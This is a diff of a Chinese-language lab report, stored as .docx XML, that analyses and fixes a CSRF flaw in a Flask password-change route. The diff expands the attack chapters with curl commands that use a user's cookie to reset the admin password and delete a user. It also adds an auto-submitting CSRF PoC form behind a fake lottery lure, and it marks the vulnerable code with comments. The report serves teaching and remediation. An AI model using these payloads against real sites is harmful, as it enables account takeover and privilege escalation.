--- a/static/CSRF跨站请求伪造漏洞分析与修复报告.docx
+++ b/static/CSRF跨站请求伪造漏洞分析与修复报告.docx
@@ -31,7 +31,7 @@
           <w:color w:val="454545"/>
           <w:sz w:val="28"/>
         </w:rPr>
-        <w:t>——基于Flask的密码修改功能CSRF漏洞实验——</w:t>
+        <w:t>——基于Flask修改密码功能的CSRF漏洞实验——</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -95,7 +95,7 @@
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>第3章  实验一：curl构造跨域恶意请求</w:t>
+        <w:t>第3章  攻击链详解：普通用户→越权管理员</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -106,7 +106,7 @@
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>第4章  实验二：Burp Suite生成CSRF PoC</w:t>
+        <w:t>第4章  实验一：curl构造跨域恶意请求修改密码</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -117,7 +117,7 @@
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>第5章  修改密码功能漏洞分析</w:t>
+        <w:t>第5章  实验二：Burp Suite生成CSRF PoC</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -128,7 +128,7 @@
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>第6章  修复方案详解（含代码）</w:t>
+        <w:t>第6章  /change-password 漏洞代码分析</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -139,7 +139,7 @@
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>第7章  修复前后代码对比</w:t>
+        <w:t>第7章  修复方案详解（含完整代码）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -150,7 +150,18 @@
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>第8章  安全编码规范总结</w:t>
+        <w:t>第8章  修复前后代码对比</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>第9章  安全编码规范总结</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -343,40 +354,6 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>所需权限</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="20"/>
-              </w:rPr>
-              <w:t>无（需用户已登录）</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="20"/>
-              </w:rPr>
               <w:t>影响</w:t>
             </w:r>
           </w:p>
@@ -393,7 +370,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>账号劫持、数据篡改、权限提升</w:t>
+              <w:t>账号劫持、权限提升、数据篡改</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -435,7 +412,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>要素2：目标站点存在CSRF漏洞 — 敏感操作仅依赖Cookie验证</w:t>
+        <w:t>要素2：目标站点存在CSRF漏洞 — 敏感操作仅依赖Cookie验证，无额外Token校验</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -456,77 +433,12 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>1.3 本应用中的CSRF漏洞</w:t>
+        <w:t>1.3 攻击场景</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>在 /change-password 路由中，存在以下CSRF相关漏洞：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-        <w:shd w:fill="FFCDD2" w:val="clear"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>🔴 漏洞1：无CSRF Token验证 — 表单可被任意网站伪造提交</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-        <w:shd w:fill="FFCDD2" w:val="clear"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>🔴 漏洞2：无需原密码 — 直接设置新密码，无需验证原密码</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-        <w:shd w:fill="FFCDD2" w:val="clear"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>🔴 漏洞3：可越权改密 — 可修改任何用户的密码，不与session绑定</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-        <w:shd w:fill="FFCDD2" w:val="clear"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>🔴 漏洞4：无Referer验证 — 不检查请求来源是否合法</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-        <w:shd w:fill="FFCDD2" w:val="clear"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>🔴 漏洞5：密码明文传输 — 新密码通过表单明文传输，可被中间人截获</w:t>
+        <w:t>本实验中，攻击者构造一个恶意HTML页面，该页面包含一个自动提交的表单，目标为用户管理系统中的 /change-password 路由。当管理员admin（已登录状态）在浏览器中打开该恶意页面时，浏览器会自动发送POST请求修改admin的密码。攻击者随后使用新密码登录admin账户，获得管理员权限。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -562,15 +474,15 @@
         </w:rPr>
         <w:t>Step 1: 用户登录目标网站 → 获得Session Cookie</w:t>
         <w:br/>
-        <w:t>Step 2: 攻击者构造恶意页面 → 包含自动提交的表单</w:t>
+        <w:t>Step 2: 攻击者构造恶意页面 → 包含自动提交的修改密码表单</w:t>
         <w:br/>
         <w:t>Step 3: 诱导用户访问恶意页面 → 通过钓鱼邮件/链接等方式</w:t>
         <w:br/>
-        <w:t>Step 4: 浏览器自动发送请求 → Cookie自动携带</w:t>
+        <w:t>Step 4: 浏览器自动发送POST请求 → Cookie自动携带</w:t>
         <w:br/>
-        <w:t>Step 5: 服务器执行操作 → 认为请求来自合法用户</w:t>
+        <w:t>Step 5: 服务器执行密码修改 → 认为请求来自合法用户</w:t>
         <w:br/>
-        <w:t>Step 6: 攻击成功 → 密码被修改/数据被篡改</w:t>
+        <w:t>Step 6: 攻击者用新密码登录 → 获得用户账号权限</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -578,7 +490,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>2.2 恶意页面示例</w:t>
+        <w:t>2.2 恶意页面示例（伪代码）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -617,25 +529,6 @@
         <w:t>&lt;/html&gt;</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>更隐蔽的方式：利用图片标签自动发送GET请求：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-        <w:shd w:fill="FFEBEE" w:val="clear"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>&lt;img src="http://target:5000/change-password?username=admin&amp;new_password=hacked123" style="display:none;" /&gt;</w:t>
-      </w:r>
-    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -654,7 +547,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>第三章  实验一：curl构造跨域恶意请求</w:t>
+        <w:t>第三章  攻击链详解：普通用户→越权管理员</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -662,25 +555,289 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>3.1 实验目标</w:t>
+        <w:t>3.1 完整攻击链</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>模拟攻击者利用已登录用户的Session Cookie，通过curl命令构造跨域恶意请求，实现无账号密码登录管理员账户。</w:t>
+        <w:t>本次实验的完整攻击链分为四步：</w:t>
       </w:r>
     </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="LightGrid-Accent1"/>
+        <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
+        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2880"/>
+        <w:gridCol w:w="2880"/>
+        <w:gridCol w:w="2880"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+            <w:shd w:fill="1A237E" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>步骤</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+            <w:shd w:fill="1A237E" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>操作</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+            <w:shd w:fill="1A237E" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>效果</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>Step 1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>alice登录系统</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>获得有效Session Cookie</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>Step 2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>CSRF攻击修改admin密码</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>admin的密码被改为攻击者指定的值</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>Step 3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>用新密码登录admin</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>攻击者获得管理员权限</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>Step 4</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>越权删除用户carlos</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>利用admin权限执行敏感操作</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>3.2 实验步骤</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Step1：攻击者先登录自己的账号获取有效Session Cookie</w:t>
+        <w:t>3.2 攻击链图</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -693,14 +850,47 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>curl -c /tmp/cookies.txt -X POST http://target:5000/login \</w:t>
+        <w:t>┌──────────┐    ┌──────────────┐    ┌──────────┐    ┌──────────┐</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  -d "username=alice&amp;password=alice2025"</w:t>
+        <w:t>│ alice登录  │──→│ CSRF改admin   │──→│ 新密码登录 │──→│ 越权删用户 │</w:t>
+        <w:br/>
+        <w:t>│ 获得Cookie │   │ 密码=hacked123│   │ admin     │   │ carlos    │</w:t>
+        <w:br/>
+        <w:t>└──────────┘    └──────────────┘    └──────────┘    └──────────┘</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>第四章  实验一：curl构造跨域恶意请求修改密码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>4.1 实验目标</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Step2：利用Session Cookie修改admin密码</w:t>
+        <w:t>模拟攻击者利用已登录用户alice的Session Cookie，通过curl命令构造跨域恶意请求，修改管理员admin的密码。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>4.2 实验步骤</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Step 1：攻击者先登录自己的账号（alice）获取有效Session Cookie</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -713,14 +903,17 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>curl -b /tmp/cookies.txt -X POST http://target:5000/change-password \</w:t>
+        <w:t>curl -c /tmp/alice_cookies.txt -X POST http://target:5000/login \</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  -d "username=admin&amp;new_password=hacked123"</w:t>
+        <w:t xml:space="preserve">  -d "username=alice&amp;password=alice2025"</w:t>
+        <w:br/>
+        <w:t># -c 参数保存服务器返回的Cookie到文件</w:t>
       </w:r>
     </w:p>
+    <w:p/>
     <w:p>
       <w:r>
-        <w:t>Step3：攻击者现在可以用admin账号登录</w:t>
+        <w:t>Step 2：利用alice的Session Cookie修改admin的密码（CSRF + 越权）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -733,14 +926,46 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>curl -X POST http://target:5000/login \</w:t>
+        <w:t>curl -b /tmp/alice_cookies.txt -X POST http://target:5000/change-password \</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  -d "username=admin&amp;password=hacked123"</w:t>
+        <w:t xml:space="preserve">  -d "username=admin&amp;new_password=hacked123"</w:t>
+        <w:br/>
+        <w:t># -b 参数在请求中附带上alice的Cookie</w:t>
+        <w:br/>
+        <w:t># ⚠️ 服务器未验证session用户与提交的username是否一致</w:t>
+        <w:br/>
+        <w:t># ⚠️ 服务器未验证CSRF Token</w:t>
+        <w:br/>
+        <w:t># ⚠️ 服务器未验证原密码</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Step 3：攻击者用新密码登录admin账户</w:t>
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+        <w:shd w:fill="FFEBEE" w:val="clear"/>
+      </w:pPr>
       <w:r>
-        <w:t>Step4：登录后获得管理员权限，可删除用户等操作</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>curl -c /tmp/admin_cookies.txt -X POST http://target:5000/login \</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">  -d "username=admin&amp;password=hacked123"</w:t>
+        <w:br/>
+        <w:t># 成功以admin身份登录！</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Step 4：利用admin权限越权删除用户</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -756,6 +981,8 @@
         <w:t>curl -b /tmp/admin_cookies.txt -X POST http://target:5000/admin/delete-user \</w:t>
         <w:br/>
         <w:t xml:space="preserve">  -d "user_id=2"</w:t>
+        <w:br/>
+        <w:t># admin权限成功删除用户</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -763,12 +990,12 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>3.3 攻击效果</w:t>
+        <w:t>4.3 攻击效果验证</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>通过上述攻击，一个普通用户alice可以：</w:t>
+        <w:t>通过上述攻击链，一名普通用户alice可以完成以下操作：</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -776,7 +1003,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>1. 修改管理员admin的密码</w:t>
+        <w:t>1. 修改管理员admin的密码（CSRF + 越权）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -784,7 +1011,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>2. 用新密码登录admin账户</w:t>
+        <w:t>2. 用新密码登录admin账户（权限提升）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -792,7 +1019,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>3. 获得管理员权限，删除其他用户</w:t>
+        <w:t>3. 利用admin权限删除其他用户（越权操作）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -800,7 +1027,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>整个过程不需要admin的原始密码，也不需要admin做任何操作</w:t>
+        <w:t>整个过程不需要admin的原始密码，也不需要admin做任何确认操作</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -808,7 +1035,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>第四章  实验二：Burp Suite生成CSRF PoC</w:t>
+        <w:t>第五章  实验二：Burp Suite生成CSRF PoC修改密码</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -816,12 +1043,12 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>4.1 实验目标</w:t>
+        <w:t>5.1 实验目标</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>使用Burp Suite拦截POST请求，自动生成CSRF攻击Proof of Concept（PoC）HTML代码，完成绕过认证的密码修改实验。</w:t>
+        <w:t>使用Burp Suite拦截POST /change-password请求，自动生成CSRF攻击Proof of Concept（PoC）HTML代码。当受害者在已登录状态下打开该HTML页面时，密码被无感知修改。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -829,28 +1056,49 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>4.2 实验步骤</w:t>
+        <w:t>5.2 实验步骤</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Step1：使用Burp Suite拦截POST /change-password请求</w:t>
+        <w:t>Step 1：使用Burp Suite拦截POST /change-password请求</w:t>
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+        <w:shd w:fill="FFEBEE" w:val="clear"/>
+      </w:pPr>
       <w:r>
-        <w:t>Step2：右键点击请求 → Engagement tools → Generate CSRF PoC</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Step3：Burp Suite自动生成CSRF攻击HTML代码</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>POST /change-password HTTP/1.1</w:t>
+        <w:br/>
+        <w:t>Host: http://target:5000</w:t>
+        <w:br/>
+        <w:t>Cookie: session=abc123...</w:t>
+        <w:br/>
+        <w:br/>
+        <w:t>username=admin&amp;new_password=attacker123</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>Burp生成的CSRF PoC HTML：</w:t>
+        <w:t>Step 2：在Burp拦截到的请求上右键 → Engagement tools → Generate CSRF PoC</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Step 3：Burp Suite自动生成CSRF攻击HTML代码</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Burp生成的CSRF PoC（修改密码版本）：</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -867,7 +1115,9 @@
         <w:br/>
         <w:t xml:space="preserve">  &lt;body&gt;</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  &lt;form action="https://target:5000/change-password" method="POST"&gt;</w:t>
+        <w:t xml:space="preserve">  &lt;h1&gt;🎉 免费抽奖！点击领取&lt;/h1&gt;</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">  &lt;form action="http://target:5000/change-password" method="POST"&gt;</w:t>
         <w:br/>
         <w:t xml:space="preserve">    &lt;input type="hidden" name="username" value="admin" /&gt;</w:t>
         <w:br/>
@@ -887,12 +1137,17 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>Step4：保存为HTML文件，在受害者浏览器中打开</w:t>
+        <w:t>Step 4：将生成的HTML代码保存为 csrf_attack.html</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Step5：受害者的密码在无感知中被修改</w:t>
+        <w:t>Step 5：在受害者浏览器中打开该HTML文件（受害者需已登录admin后台）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Step 6：admin的密码被无感知修改为 attacker123</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -900,7 +1155,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>4.3 CSRF PoC的关键点</w:t>
+        <w:t>5.3 CSRF PoC的关键组件</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -981,7 +1236,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>包含目标URL和所有必需参数</w:t>
+              <w:t>POST方法提交到 /change-password 路由</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1015,7 +1270,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>隐藏字段传递参数，用户不可见</w:t>
+              <w:t>隐藏字段：username=admin, new_password=attacker123</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1049,7 +1304,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>页面加载后自动提交表单，无需用户点击</w:t>
+              <w:t>页面加载后立即提交表单，用户无感知</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1067,7 +1322,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>使用HTTPS</w:t>
+              <w:t>攻击链扩展</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1083,7 +1338,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>生产环境中需要匹配目标协议</w:t>
+              <w:t>修改密码后可登录admin删除其他用户</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1094,7 +1349,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>第五章  修改密码功能漏洞分析</w:t>
+        <w:t>第六章  /change-password 漏洞代码分析</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1102,7 +1357,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>5.1 漏洞代码</w:t>
+        <w:t>6.1 有漏洞代码（app.py）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1124,22 +1379,36 @@
         <w:t xml:space="preserve">        return redirect("/login")</w:t>
         <w:br/>
         <w:br/>
-        <w:t xml:space="preserve">    username = request.form.get("username", "")   # ⚠️ 用户可控</w:t>
+        <w:t xml:space="preserve">    username = request.form.get("username", "")       # ⚠️ 用户可控</w:t>
         <w:br/>
         <w:t xml:space="preserve">    new_password = request.form.get("new_password", "")</w:t>
         <w:br/>
         <w:br/>
-        <w:t xml:space="preserve">    # ⚠️ 无CSRF Token验证</w:t>
+        <w:t xml:space="preserve">    if not username or not new_password:</w:t>
         <w:br/>
-        <w:t xml:space="preserve">    # ⚠️ 无原密码验证</w:t>
+        <w:t xml:space="preserve">        return "缺少参数"</w:t>
         <w:br/>
-        <w:t xml:space="preserve">    # ⚠️ 无session与username匹配检查（越权）</w:t>
         <w:br/>
-        <w:t xml:space="preserve">    # ⚠️ SQL注入</w:t>
+        <w:t xml:space="preserve">    # ⚠️ 漏洞1：无CSRF Token验证 → 任意网站可伪造提交</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">    # ⚠️ 漏洞2：无原密码验证 → 直接设置新密码</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">    # ⚠️ 漏洞3：无Session绑定 → 可修改任意用户密码（越权）</w:t>
